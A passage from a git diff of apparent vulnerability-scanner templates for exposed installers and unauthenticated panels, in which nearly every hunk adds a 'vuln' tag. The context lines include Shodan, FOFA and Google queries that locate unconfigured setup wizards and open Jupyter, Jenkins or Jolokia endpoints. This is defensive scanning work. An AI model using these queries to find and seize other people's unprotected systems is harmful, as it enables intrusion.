b/http/misconfiguration/installer/setup-github-enterprise.yaml @@ -12,7 +12,7 @@ info: vendor: github product: enterprise_server shodan-query: http.favicon.hash:-1373456171 - tags: misconfig,installer,github,setup + tags: misconfig,installer,github,setup,vuln http: - method: GET diff --git a/http/misconfiguration/installer/shopify-app-installer.yaml b/http/misconfiguration/installer/shopify-app-installer.yaml index e1f73cb6b78..0d8b2b96e72 100644 --- a/http/misconfiguration/installer/shopify-app-installer.yaml +++ b/http/misconfiguration/installer/shopify-app-installer.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: title:"Shopify App — Installation" - tags: misconfig,shopify,install + tags: misconfig,shopify,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/shopware-installer.yaml b/http/misconfiguration/installer/shopware-installer.yaml index 1862385f004..d0685c83d5e 100644 --- a/http/misconfiguration/installer/shopware-installer.yaml +++ b/http/misconfiguration/installer/shopware-installer.yaml @@ -15,7 +15,7 @@ info: vendor: shopware product: shopware fofa-query: title="Installation | Shopware 6" - tags: misconfig,shopware,install,exposure + tags: misconfig,shopware,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/smf-installer.yaml b/http/misconfiguration/installer/smf-installer.yaml index 7c5f92d5503..3e10c3e9c7b 100644 --- a/http/misconfiguration/installer/smf-installer.yaml +++ b/http/misconfiguration/installer/smf-installer.yaml @@ -13,7 +13,7 @@ info: vendor: simplemachines product: simple_machine_forum shodan-query: title:"SMF Installer" - tags: misconfig,smf,install,exposure + tags: misconfig,smf,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/sms-installer.yaml b/http/misconfiguration/installer/sms-installer.yaml index 298c788c297..6aa262d4c96 100644 --- a/http/misconfiguration/installer/sms-installer.yaml +++ b/http/misconfiguration/installer/sms-installer.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"SMS Gateway | Installation" - tags: misconfig,sms,install + tags: misconfig,sms,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/snipe-it-installer.yaml b/http/misconfiguration/installer/snipe-it-installer.yaml index 119d9f00d0b..839f4bb2726 100644 --- a/http/misconfiguration/installer/snipe-it-installer.yaml +++ b/http/misconfiguration/installer/snipe-it-installer.yaml @@ -16,7 +16,7 @@ info: vendor: snipeitapp product: snipe-it shodan-query: html:"Snipe-IT Setup" - tags: misconfig,install,exposure,snipe-it + tags: misconfig,install,exposure,snipe-it,vuln http: - method: GET diff --git a/http/misconfiguration/installer/spa-cart-installer.yaml b/http/misconfiguration/installer/spa-cart-installer.yaml index 31feaef339a..cd4091bebb7 100644 --- a/http/misconfiguration/installer/spa-cart-installer.yaml +++ b/http/misconfiguration/installer/spa-cart-installer.yaml @@ -14,7 +14,7 @@ info: vendor: spa-cart product: spa-cart fofa-query: title="SPA Cart Installation" - tags: spa-cart,exposure,installer,misconfig + tags: spa-cart,exposure,installer,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/installer/spip-install.yaml b/http/misconfiguration/installer/spip-install.yaml index 0d8eae30ed4..dbae975dd67 100644 --- a/http/misconfiguration/installer/spip-install.yaml +++ b/http/misconfiguration/installer/spip-install.yaml @@ -8,7 +8,7 @@ info: metadata: verified: "true" max-request: 1 - tags: exposure,spip,install,misconfig + tags: exposure,spip,install,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/installer/stackposts-installer.yaml b/http/misconfiguration/installer/stackposts-installer.yaml index 0c183c44427..1dd0e9998b4 100644 --- a/http/misconfiguration/installer/stackposts-installer.yaml +++ b/http/misconfiguration/installer/stackposts-installer.yaml @@ -13,7 +13,7 @@ info: max-request: 1 shodan-query: html:"Install - StackPosts" fofa-query: icon_hash="700046539" - tags: misconfig,install,exposure,stackposts + tags: misconfig,install,exposure,stackposts,vuln http: - method: GET diff --git a/http/misconfiguration/installer/strapi-admin-installer.yaml b/http/misconfiguration/installer/strapi-admin-installer.yaml index 19955f16d90..538afe55b55 100644 --- a/http/misconfiguration/installer/strapi-admin-installer.yaml +++ b/http/misconfiguration/installer/strapi-admin-installer.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"Welcome to your Strapi app" html:"create an administrator" - tags: misconfig,exposure,strapi,install + tags: misconfig,exposure,strapi,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/strongshop-installer.yaml b/http/misconfiguration/installer/strongshop-installer.yaml index 8e5294f328e..0f94dcdd8a9 100644 --- a/http/misconfiguration/installer/strongshop-installer.yaml +++ b/http/misconfiguration/installer/strongshop-installer.yaml @@ -12,7 +12,7 @@ info: product: strongshop shodan-query: title:"StrongShop" fofa-query: title="StrongShop" - tags: strongshop,installer,exposure,misconfig + tags: strongshop,installer,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/installer/subrion-installer.yaml b/http/misconfiguration/installer/subrion-installer.yaml index 15c508e33f6..0b990fced2e 100644 --- a/http/misconfiguration/installer/subrion-installer.yaml +++ b/http/misconfiguration/installer/subrion-installer.yaml @@ -16,7 +16,7 @@ info: vendor: intelliants product: subrion fofa-query: title="Subrion CMS Web Installer" - tags: subrion,cms,install,misconfig + tags: subrion,cms,install,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/installer/sugarcrm-install.yaml b/http/misconfiguration/installer/sugarcrm-install.yaml index b11d5ced243..2beac7e20e2 100644 --- a/http/misconfiguration/installer/sugarcrm-install.yaml +++ b/http/misconfiguration/installer/sugarcrm-install.yaml @@ -13,7 +13,7 @@ info: vendor: sugarcrm product: sugarcrm shodan-query: title:"Sugar Setup Wizard" - tags: misconfig,sugar,sugarcrm,install + tags: misconfig,sugar,sugarcrm,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/suitecrm-installer.yaml b/http/misconfiguration/installer/suitecrm-installer.yaml index e992855b798..e4c215a4bdc 100644 --- a/http/misconfiguration/installer/suitecrm-installer.yaml +++ b/http/misconfiguration/installer/suitecrm-installer.yaml @@ -13,7 +13,7 @@ info: vendor: salesagility product: suitecrm shodan-query: title:"SuiteCRM" - tags: misconfig,suitecrm,install + tags: misconfig,suitecrm,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/sumowebtools-installer.yaml b/http/misconfiguration/installer/sumowebtools-installer.yaml index 2b5f27fe254..e78c6004584 100644 --- a/http/misconfiguration/installer/sumowebtools-installer.yaml +++ b/http/misconfiguration/installer/sumowebtools-installer.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: title:"SumoWebTools Installer" - tags: misconfig,sumowebtools,install,exposure + tags: misconfig,sumowebtools,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/tasmota-install.yaml b/http/misconfiguration/installer/tasmota-install.yaml index 326a1e288e6..f530da4b9c5 100644 --- a/http/misconfiguration/installer/tasmota-install.yaml +++ b/http/misconfiguration/installer/tasmota-install.yaml @@ -13,7 +13,7 @@ info: vendor: tasmota_project product: tasmota shodan-query: title:"Tasmota" - tags: misconfig,tasmota,install,exposure + tags: misconfig,tasmota,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/tastyigniter-installer.yaml b/http/misconfiguration/installer/tastyigniter-installer.yaml index ed125d95100..5d7cfb45d8c 100644 --- a/http/misconfiguration/installer/tastyigniter-installer.yaml +++ b/http/misconfiguration/installer/tastyigniter-installer.yaml @@ -16,7 +16,7 @@ info: vendor: tastyigniter product: tastyigniter fofa-query: body="TastyIgniter - Setup - License agreement" - tags: misconfig,install,exposure,tastyigniter + tags: misconfig,install,exposure,tastyigniter,vuln http: - method: GET diff --git a/http/misconfiguration/installer/tautulli-install.yaml b/http/misconfiguration/installer/tautulli-install.yaml index d83074809dd..57ee7a0277d 100644 --- a/http/misconfiguration/installer/tautulli-install.yaml +++ b/http/misconfiguration/installer/tautulli-install.yaml @@ -13,7 +13,7 @@ info: vendor: tautulli product: tautulli shodan-query: title:"Tautulli - Welcome" - tags: misconfig,tautulli,install + tags: misconfig,tautulli,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/testrail-install.yaml b/http/misconfiguration/installer/testrail-install.yaml index 39409680f99..a05beb08bdc 100644 --- a/http/misconfiguration/installer/testrail-install.yaml +++ b/http/misconfiguration/installer/testrail-install.yaml @@ -13,7 +13,7 @@ info: vendor: gurock product: testrail shodan-query: title:"TestRail Installation Wizard" - tags: misconfig,testrail,install,exposure + tags: misconfig,testrail,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/tiny-rss-installer.yaml b/http/misconfiguration/installer/tiny-rss-installer.yaml index 3f64dfb86e3..feb6fcf6fd9 100644 --- a/http/misconfiguration/installer/tiny-rss-installer.yaml +++ b/http/misconfiguration/installer/tiny-rss-installer.yaml @@ -13,7 +13,7 @@ info: vendor: tt-rss product: tiny_tiny_rss shodan-query: title:"Tiny Tiny RSS - Installer" - tags: misconfig,tiny,install + tags: misconfig,tiny,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/totolink-installer.yaml b/http/misconfiguration/installer/totolink-installer.yaml index a51409b46f7..9deb5a535b8 100644 --- a/http/misconfiguration/installer/totolink-installer.yaml +++ b/http/misconfiguration/installer/totolink-installer.yaml @@ -11,7 +11,7 @@ info: product: TOTOLINK shodan-query: title:"TOTOLINK" fofa-query: title="TOTOLINK" - tags: totolink,router,setup,exposure,installer + tags: totolink,router,setup,exposure,installer,vuln http: - method: GET diff --git a/http/misconfiguration/installer/trilium-notes-installer.yaml b/http/misconfiguration/installer/trilium-notes-installer.yaml index a8e4ef7b2d6..b42fa255236 100644 --- a/http/misconfiguration/installer/trilium-notes-installer.yaml +++ b/http/misconfiguration/installer/trilium-notes-installer.yaml @@ -9,7 +9,7 @@ info: metadata: max-request: 1 shodan-query: "html:\"Trilium Notes\"" - tags: trilium,setup,misconfig,installer + tags: trilium,setup,misconfig,installer,vuln http: - method: GET diff --git a/http/misconfiguration/installer/turbo-website-installer.yaml b/http/misconfiguration/installer/turbo-website-installer.yaml index 1c135b4d07b..ed99b6edd53 100644 --- a/http/misconfiguration/installer/turbo-website-installer.yaml +++ b/http/misconfiguration/installer/turbo-website-installer.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: title:"Turbo Website Reviewer" - tags: turbo,misconfig,exposure,install + tags: turbo,misconfig,exposure,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/typo3-installer.yaml b/http/misconfiguration/installer/typo3-installer.yaml index c90753090d7..4123199dd4a 100644 --- a/http/misconfiguration/installer/typo3-installer.yaml +++ b/http/misconfiguration/installer/typo3-installer.yaml @@ -13,7 +13,7 @@ info: vendor: typo3 product: typo3 shodan-query: title:"Installing TYPO3 CMS" - tags: misconfig,typo3,install + tags: misconfig,typo3,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/ubersmith-installer.yaml b/http/misconfiguration/installer/ubersmith-installer.yaml index 3454c9a8d81..cc5d5e102ff 100644 --- a/http/misconfiguration/installer/ubersmith-installer.yaml +++ b/http/misconfiguration/installer/ubersmith-installer.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: html:"Ubersmith Setup" - tags: misconfig,install,exposure,ubersmith + tags: misconfig,install,exposure,ubersmith,vuln http: - method: GET diff --git a/http/misconfiguration/installer/umbraco-installer.yaml b/http/misconfiguration/installer/umbraco-installer.yaml index b5d34c28ba7..9077acbd8a4 100644 --- a/http/misconfiguration/installer/umbraco-installer.yaml +++ b/http/misconfiguration/installer/umbraco-installer.yaml @@ -13,7 +13,7 @@ info: vendor: umbraco product: umbraco_cms shodan-query: title:"Install Umbraco" - tags: misconfig,umbraco,install,oss + tags: misconfig,umbraco,install,oss,vuln http: - method: GET diff --git a/http/misconfiguration/installer/unifi-wizard-install.yaml b/http/misconfiguration/installer/unifi-wizard-install.yaml index 76b313208f1..264a8753195 100644 --- a/http/misconfiguration/installer/unifi-wizard-install.yaml +++ b/http/misconfiguration/installer/unifi-wizard-install.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: title:"UniFi Wizard" - tags: misconfig,install,unifi,exposure + tags: misconfig,install,unifi,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml b/http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml index 749464c54d6..4bee4ec65eb 100644 --- a/http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml +++ b/http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: html:"UVDesk Helpdesk Community Edition - Installation Wizard" - tags: misconfig,install,exposure,uvdesk,helpdesk + tags: misconfig,install,exposure,uvdesk,helpdesk,vuln http: - method: GET diff --git a/http/misconfiguration/installer/uvdesk-install.yaml b/http/misconfiguration/installer/uvdesk-install.yaml index 66513a93016..74e8416b3cf 100644 --- a/http/misconfiguration/installer/uvdesk-install.yaml +++ b/http/misconfiguration/installer/uvdesk-install.yaml @@ -13,7 +13,7 @@ info: vendor: webkul product: uvdesk shodan-query: title:"UVDesk Helpdesk Community Edition - Installation Wizard" - tags: misconfig,uvdesk,install,exposure + tags: misconfig,uvdesk,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/vironeer-installer.yaml b/http/misconfiguration/installer/vironeer-installer.yaml index d11801fe018..6e633facf78 100644 --- a/http/misconfiguration/installer/vironeer-installer.yaml +++ b/http/misconfiguration/installer/vironeer-installer.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 fofa-query: icon_hash="1315386913" - tags: misconfig,vironeer,install,exposure + tags: misconfig,vironeer,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/virtual-smartzone-installer.yaml b/http/misconfiguration/installer/virtual-smartzone-installer.yaml index 64564ed56a0..6cafebbf0e0 100644 --- a/http/misconfiguration/installer/virtual-smartzone-installer.yaml +++ b/http/misconfiguration/installer/virtual-smartzone-installer.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: html:"Virtual SmartZone" - tags: misconfig,install,exposure,virtual-smartzone + tags: misconfig,install,exposure,virtual-smartzone,vuln http: - method: GET diff --git a/http/misconfiguration/installer/vtiger-installer.yaml b/http/misconfiguration/installer/vtiger-installer.yaml index 9b0c64fa674..13c145d295f 100644 --- a/http/misconfiguration/installer/vtiger-installer.yaml +++ b/http/misconfiguration/installer/vtiger-installer.yaml @@ -13,7 +13,7 @@ info: vendor: vtiger product: vtiger_crm shodan-query: html:"Welcome to Vtiger CRM" - tags: misconfig,vtiger,install,exposure + tags: misconfig,vtiger,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/webasyst-installer.yaml b/http/misconfiguration/installer/webasyst-installer.yaml index 0783e6ea372..d439202577d 100644 --- a/http/misconfiguration/installer/webasyst-installer.yaml +++ b/http/misconfiguration/installer/webasyst-installer.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: http.html:"Webasyst Installer" - tags: misconfig,webasyst,install,exposure + tags: misconfig,webasyst,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/webcalendar-install.yaml b/http/misconfiguration/installer/webcalendar-install.yaml index 54b2c291f1a..035be96c9db 100644 --- a/http/misconfiguration/installer/webcalendar-install.yaml +++ b/http/misconfiguration/installer/webcalendar-install.yaml @@ -14,7 +14,7 @@ info: product: webcalendar shodan-query: title:"WebCalendar Setup Wizard" fofa-query: title="WebCalendar Setup Wizard" - tags: misconfig,webcalendar,install + tags: misconfig,webcalendar,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/webtrees-install.yaml b/http/misconfiguration/installer/webtrees-install.yaml index 420077ef96e..e70edf808e5 100644 --- a/http/misconfiguration/installer/webtrees-install.yaml +++ b/http/misconfiguration/installer/webtrees-install.yaml @@ -13,7 +13,7 @@ info: vendor: webtrees product: webtrees shodan-query: title:"Setup wizard for webtrees" - tags: misconfig,webtrees,install + tags: misconfig,webtrees,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/webuzo-installer.yaml b/http/misconfiguration/installer/webuzo-installer.yaml index 6985a80cb58..16836e573f7 100644 --- a/http/misconfiguration/installer/webuzo-installer.yaml +++ b/http/misconfiguration/installer/webuzo-installer.yaml @@ -13,7 +13,7 @@ info: vendor: softaculous product: webuzo shodan-query: title:"Webuzo Installer" - tags: misconfig,webuzo,install,exposure + tags: misconfig,webuzo,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/wiki-js-installer.yaml b/http/misconfiguration/installer/wiki-js-installer.yaml index 1e1735ad03c..867f5815f56 100644 --- a/http/misconfiguration/installer/wiki-js-installer.yaml +++ b/http/misconfiguration/installer/wiki-js-installer.yaml @@ -14,7 +14,7 @@ info: vendor: requarks product: wiki.js shodan-query: title:"Wiki.js Setup" - tags: install,wiki-js,exposure,misconfig + tags: install,wiki-js,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/installer/wowcms-installer.yaml b/http/misconfiguration/installer/wowcms-installer.yaml index 3bd3943a7bb..806308e24b7 100644 --- a/http/misconfiguration/installer/wowcms-installer.yaml +++ b/http/misconfiguration/installer/wowcms-installer.yaml @@ -10,7 +10,7 @@ info: max-request: 1 shodan-query: title:"WoW-CMS | Installation" fofa-query: title="WoW-CMS | Installation" - tags: misconfig,wowcms,install,exposure + tags: misconfig,wowcms,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/wowonder-installer.yaml b/http/misconfiguration/installer/wowonder-installer.yaml index e38481d0aa3..87acd1436da 100644 --- a/http/misconfiguration/installer/wowonder-installer.yaml +++ b/http/misconfiguration/installer/wowonder-installer.yaml @@ -16,7 +16,7 @@ info: vendor: wowonder product: wowonder fofa-query: body="WoWonder | Installation" - tags: misconfig,install,exposure,wowonder + tags: misconfig,install,exposure,wowonder,vuln http: - method: GET diff --git a/http/misconfiguration/installer/wp-install.yaml b/http/misconfiguration/installer/wp-install.yaml index 0d6d25e7fc4..58383747e28 100644 --- a/http/misconfiguration/installer/wp-install.yaml +++ b/http/misconfiguration/installer/wp-install.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-284 metadata: max-request: 1 - tags: misconfig,panel,wordpress + tags: misconfig,panel,wordpress,vuln http: - method: GET diff --git a/http/misconfiguration/installer/xbackbone-installer.yaml b/http/misconfiguration/installer/xbackbone-installer.yaml index af12734f7c5..83127d71076 100644 --- a/http/misconfiguration/installer/xbackbone-installer.yaml +++ b/http/misconfiguration/installer/xbackbone-installer.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"XBackBone Installer" - tags: install,xbackbone,exposure,misconfig + tags: install,xbackbone,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/installer/yzmcms-installer.yaml b/http/misconfiguration/installer/yzmcms-installer.yaml index fb3c412a545..b67acc8e9cc 100644 --- a/http/misconfiguration/installer/yzmcms-installer.yaml +++ b/http/misconfiguration/installer/yzmcms-installer.yaml @@ -14,7 +14,7 @@ info: product: yzmcms shodan-query: title:"YzmCMS" fofa-query: title="YzmCMS" - tags: misconfig,yzmcms,install,exposure + tags: misconfig,yzmcms,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/zabbix-installer.yaml b/http/misconfiguration/installer/zabbix-installer.yaml index 80da8271ed9..ddf9e6c97b3 100644 --- a/http/misconfiguration/installer/zabbix-installer.yaml +++ b/http/misconfiguration/installer/zabbix-installer.yaml @@ -19,7 +19,7 @@ info: - app="zabbix-监控系统" && body="saml" - title="zabbix-server" google-query: intitle:"zabbix-server" - tags: misconfig,zabbix,install,exposure + tags: misconfig,zabbix,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/zencart-installer.yaml b/http/misconfiguration/installer/zencart-installer.yaml index 09f0236a6aa..4681b865340 100644 --- a/http/misconfiguration/installer/zencart-installer.yaml +++ b/http/misconfiguration/installer/zencart-installer.yaml @@ -16,7 +16,7 @@ info: product: zen_cart shodan-query: html:"shopping cart program by zen cart" fofa-query: title="Installer" && icon_hash="899320116" - tags: misconfig,zencart,install,exposure + tags: misconfig,zencart,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/zenphoto-setup.yaml b/http/misconfiguration/installer/zenphoto-setup.yaml index 04942872841..5d1273e0173 100644 --- a/http/misconfiguration/installer/zenphoto-setup.yaml +++ b/http/misconfiguration/installer/zenphoto-setup.yaml @@ -16,7 +16,7 @@ info: shodan-query: title:"Zenphoto install" product: zenphoto vendor: zenphoto - tags: misconfig,panel,zenphoto,setup,installer + tags: misconfig,panel,zenphoto,setup,installer,vuln http: - method: GET diff --git a/http/misconfiguration/installer/zipline-installer.yaml b/http/misconfiguration/installer/zipline-installer.yaml index 33f3df45ba2..490b42e2430 100644 --- a/http/misconfiguration/installer/zipline-installer.yaml +++ b/http/misconfiguration/installer/zipline-installer.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: misconfig,setup,zipline,installer + tags: misconfig,setup,zipline,installer,vuln http: - method: GET diff --git a/http/misconfiguration/intelbras-dvr-unauth.yaml b/http/misconfiguration/intelbras-dvr-unauth.yaml index 0274474f213..7b8dcc1b688 100644 --- a/http/misconfiguration/intelbras-dvr-unauth.yaml +++ b/http/misconfiguration/intelbras-dvr-unauth.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: "body=\"Intelbras\"" - tags: unauth,intelbras,dvr,misconfig + tags: unauth,intelbras,dvr,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/intercom-identity-misconfiguration.yaml b/http/misconfiguration/intercom-identity-misconfiguration.yaml index cd49aeb89be..93b353a2fe5 100644 --- a/http/misconfiguration/intercom-identity-misconfiguration.yaml +++ b/http/misconfiguration/intercom-identity-misconfiguration.yaml @@ -9,7 +9,7 @@ info: reference: - https://medium.com/@hellother18/uncovering-a-vulnerability-in-intercom-widget-chat-configuration-e5633d06df60 - https://www.intercom.com/help/en/articles/183-set-up-identity-verification-for-web-and-mobile - tags: intercom,unauth,exposure,misconfig + tags: intercom,unauth,exposure,misconfig,vuln variables: user_email: "test@example.com" diff --git a/http/misconfiguration/internal-ip-disclosure.yaml b/http/misconfiguration/internal-ip-disclosure.yaml index 9030d8e5fad..092e31d741d 100644 --- a/http/misconfiguration/internal-ip-disclosure.yaml +++ b/http/misconfiguration/internal-ip-disclosure.yaml @@ -8,7 +8,7 @@ info: - https://support.kemptechnologies.com/hc/en-us/articles/203522429-How-to-Mitigate-Against-Internal-IP-Address-Domain-Name-Disclosure-In-Real-Server-Redirect metadata: max-request: 2 - tags: misconfig,disclosure + tags: misconfig,disclosure,vuln http: - raw: diff --git a/http/misconfiguration/iot-vdme-simulator.yaml b/http/misconfiguration/iot-vdme-simulator.yaml index 03141f9f490..6b2a5513980 100644 --- a/http/misconfiguration/iot-vdme-simulator.yaml +++ b/http/misconfiguration/iot-vdme-simulator.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 2 shodan-query: http.title:"IoT vDME Simulator" - tags: exposure,misconfig,panel + tags: exposure,misconfig,panel,vuln http: - method: GET diff --git a/http/misconfiguration/jackett-unauth.yaml b/http/misconfiguration/jackett-unauth.yaml index f8d4fc45719..cbbbf32310a 100644 --- a/http/misconfiguration/jackett-unauth.yaml +++ b/http/misconfiguration/jackett-unauth.yaml @@ -11,7 +11,7 @@ info: max-request: 2 shodan-query: title:"Jackett" fofa-query: title="Jackett" - tags: unauth,misconfig,exposure,jackett-ui + tags: unauth,misconfig,exposure,jackett-ui,vuln http: - method: GET diff --git a/http/misconfiguration/jaeger-ui-dashboard.yaml b/http/misconfiguration/jaeger-ui-dashboard.yaml index cfdd70f9c69..ad2135dc422 100644 --- a/http/misconfiguration/jaeger-ui-dashboard.yaml +++ b/http/misconfiguration/jaeger-ui-dashboard.yaml @@ -15,7 +15,7 @@ info: vendor: jaegertracing product: jaeger_ui shodan-query: http.title:"Jaeger UI" - tags: misconfig + tags: misconfig,discovery http: - method: GET diff --git a/http/misconfiguration/java-melody-exposed.yaml b/http/misconfiguration/java-melody-exposed.yaml index 759cc860f77..90f4f3a402e 100644 --- a/http/misconfiguration/java-melody-exposed.yaml +++ b/http/misconfiguration/java-melody-exposed.yaml @@ -10,7 +10,7 @@ info: - https://github.com/javamelody/javamelody/wiki/UserGuide#16-security metadata: max-request: 2 - tags: config,java,javamelody,misconfig + tags: config,java,javamelody,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/jboss-status.yaml b/http/misconfiguration/jboss-status.yaml index e87bf707bef..c7c9d7de96f 100644 --- a/http/misconfiguration/jboss-status.yaml +++ b/http/misconfiguration/jboss-status.yaml @@ -19,7 +19,7 @@ info: google-query: inurl:/web-console/ServerInfo.jsp | inurl:/status?full=true product: jboss_enterprise_application_platform vendor: redhat - tags: jboss,unauth,edb,misconfig + tags: jboss,unauth,edb,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/jboss-web-service.yaml b/http/misconfiguration/jboss-web-service.yaml index 2e98bd159a2..e3bc948134a 100644 --- a/http/misconfiguration/jboss-web-service.yaml +++ b/http/misconfiguration/jboss-web-service.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: html:"JBossWS" - tags: jboss,misconfig + tags: jboss,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/jenkins/jenkins-openuser-register.yaml b/http/misconfiguration/jenkins/jenkins-openuser-register.yaml index ed4aae677f0..99f961aad25 100644 --- a/http/misconfiguration/jenkins/jenkins-openuser-register.yaml +++ b/http/misconfiguration/jenkins/jenkins-openuser-register.yaml @@ -16,7 +16,7 @@ info: vendor: jenkins product: jenkins shodan-query: "X-Jenkins" - tags: misconfig,jenkins,apache,tomcat + tags: misconfig,jenkins,apache,tomcat,vuln http: - method: GET diff --git a/http/misconfiguration/jetty-showcontexts-enable.yaml b/http/misconfiguration/jetty-showcontexts-enable.yaml index a6df04b8026..b194f2a0cc7 100644 --- a/http/misconfiguration/jetty-showcontexts-enable.yaml +++ b/http/misconfiguration/jetty-showcontexts-enable.yaml @@ -16,7 +16,7 @@ info: vendor: eclipse product: jetty shodan-query: html:"contexts known to this" - tags: jetty,misconfig + tags: jetty,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/jolokia/jolokia-info-disclosure.yaml b/http/misconfiguration/jolokia/jolokia-info-disclosure.yaml index ced1bdfafc5..bd964a44e49 100644 --- a/http/misconfiguration/jolokia/jolokia-info-disclosure.yaml +++ b/http/misconfiguration/jolokia/jolokia-info-disclosure.yaml @@ -10,7 +10,7 @@ info: - https://github.com/laluka/jolokia-exploitation-toolkit metadata: max-request: 16 - tags: jolokia,springboot,mbean,misconfig + tags: jolokia,springboot,mbean,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/jolokia/jolokia-mbean-search.yaml b/http/misconfiguration/jolokia/jolokia-mbean-search.yaml index 857eca10f56..ac6255a5d58 100644 --- a/http/misconfiguration/jolokia/jolokia-mbean-search.yaml +++ b/http/misconfiguration/jolokia/jolokia-mbean-search.yaml @@ -10,7 +10,7 @@ info: - https://github.com/laluka/jolokia-exploitation-toolkit metadata: max-request: 2 - tags: jolokia,springboot,mbean,tomcat,misconfig + tags: jolokia,springboot,mbean,tomcat,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/jupyter-ipython-unauth.yaml b/http/misconfiguration/jupyter-ipython-unauth.yaml index 354b4213cfc..59afbff0fa4 100644 --- a/http/misconfiguration/jupyter-ipython-unauth.yaml +++ b/http/misconfiguration/jupyter-ipython-unauth.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-288 metadata: max-request: 1 - tags: unauth,jupyter,misconfig + tags: unauth,jupyter,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/jupyter-lab-unauth.yaml b/http/misconfiguration/jupyter-lab-unauth.yaml index fff2c479303..6eafb7cbeba 100644 --- a/http/misconfiguration/jupyter-lab-unauth.yaml +++ b/http/misconfiguration/jupyter-lab-unauth.yaml @@ -15,7 +15,7 @@ info: metadata: max-request: 1 shodan-query: http.favicon.hash:450899026 - tags: unauth,jupyter,jupyterlab,misconfig + tags: unauth,jupyter,jupyterlab,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/jupyter-notebooks-exposed.yaml b/http/misconfiguration/jupyter-notebooks-exposed.yaml index 2520688acfd..399373bfb1f 100644 --- a/http/misconfiguration/jupyter-notebooks-exposed.yaml +++ b/http/misconfiguration/jupyter-notebooks-exposed.yaml @@ -14,7 +14,7 @@ info: vendor: jupyter product: notebook shodan-query: title:"Home Page - Select or create a notebook" - tags: jupyter,misconfig + tags: jupyter,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/kafka-cruise-control.yaml b/http/misconfiguration/kafka-cruise-control.yaml index 720e1a29b97..4a42148bcee 100644 --- a/http/misconfiguration/kafka-cruise-control.yaml +++ b/http/misconfiguration/kafka-cruise-control.yaml @@ -8,7 +8,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Kafka Cruise Control UI" - tags: kafka,misconfig + tags: kafka,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/kubeflow-dashboard-unauth.yaml b/http/misconfiguration/kubeflow-dashboard-unauth.yaml index 70ee22ec31b..5c170822a94 100644 --- a/http/misconfiguration/kubeflow-dashboard-unauth.yaml +++ b/http/misconfiguration/kubeflow-dashboard-unauth.yaml @@ -9,7 +9,7 @@ info: - https://github.com/kubeflow/kubeflow metadata: max-request: 1 - tags: kubeflow,unauth,misconfig + tags: kubeflow,unauth,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/kubernetes/kube-state-metrics.yaml b/http/misconfiguration/kubernetes/kube-state-metrics.yaml index ab62041181b..5913a7d6a19 100644 --- 